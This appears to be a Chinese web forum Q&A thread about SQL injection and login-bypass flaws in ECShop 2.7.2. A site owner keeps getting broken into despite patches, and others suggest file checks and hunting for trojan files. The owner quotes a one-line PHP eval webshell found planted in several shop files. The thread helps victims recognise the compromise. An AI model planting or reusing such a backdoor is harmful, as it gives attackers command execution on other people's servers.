ECSHOP 2.72最新SQL注入漏洞好像还没有解决吧
2016-07-07 15:26 来源:www.chinab4c.com 作者:ecshop专家
ECShop 2.7.2 最新任意用户登陆漏洞0day 2.7.2 最新任意用户登录漏洞代码 ECSHOP 2.72最新SQL注入漏洞原帖:http://bbs.mmbest.com/viewthread.php?tid=155432 |
回答:
补丁 http://bbs.ecshop.com/thread-127611-1-1.html |
那个帖子是ECShop V2.7.2 UTF8_Release0505 ECShop网店系统 V2.7.2 Release 0604正式版发布 建议使用最新版本~ flow.php这个是破后台密码,并不能植入文件。 |
那个帖子是ECShop V2.7.2 UTF8_Release0505 我是用的ECShop网店系统 V2.7.2 Release 0604 这个版本 怎么不让知道后台密码? |
这个sql 是弄 管理员密码,密码是经过md5加密的,所以只要密码够复杂,那么对方即使拿到了也破不了。 |
2.7220100604版本的代码怎么和别人发现漏洞的代码还是一样呢 |
这个sql 是弄 管理员密码,密码是经过md5加密的,所以只要密码够复杂,那么对方即使拿到了也破不了。 还是不行,密码那么复杂还是不行 没几分钟又进来了 还是flow被修改, |
那么文件校验,查看什么文件被修改过了。还有清除换,查看image文件夹的各个文件,里面是否有特殊的php或js文件。那些可能是木马源文件。 |
连空间的image文件都可以删除啊 太夸张了,不是只有管理员后台密码就可以做到的吧 |
flow.php auction.php 还有一个ecs.php都有这个代码 <?php eval($_POST[cmd]);?> 还有这个代码,是后门么? |
最近我的ecshop2.72 0505的版本也不消停,吃不消啊! 有些人拿着后台向你炫耀。 |
被挂木马了 |
明白了,明白了,可还是不明白 |
最近更新
常用插件
- ecshop快递发货单打印商品
ecshop快递发货单打印商品信息,大家都知道ecshop快递单打印的时候,只能...
- ecshop选择下单时间插件
ecshop选择下单时间插件主要是根据不同的下单配送要求,在ecshop购物车...
- ecshop二次开发售后维修卡
插件介绍: 本插件是用于专门从事电子,信息,软件等售后服务关键比...
- ecshop按分类筛选销售排行
ecshop按分类筛选销售排行...
- ecshop供应商插件免费下载
ecshop供应商插件免费下载...
ecshop热门问答
ecshop热门资料
ecshop休闲养生馆
ecshopalpha
ecshop都差不多
ecshop填写信息
ecshop邮政
ecshopFocus
ecshop知名度
ecshop重庆大学
ecshop奔腾双核
ecshop配送区域
ecshopclothing服装模板
ecshopmarked
ecshop紧急
ecshopopen_type
ecshopshtml
ecshop容量
ecshop配送打印模板
ecshop翻倍
ecshoplogs
ecshopdocs
ecshopCNZZ
ecshop欧宝
ecshop起订量
ecshop友情
cls_page
ecshop广告添加问题
ecshop三者
ecshop爱慕
ecshop卡通拖鞋
ecshop网站错位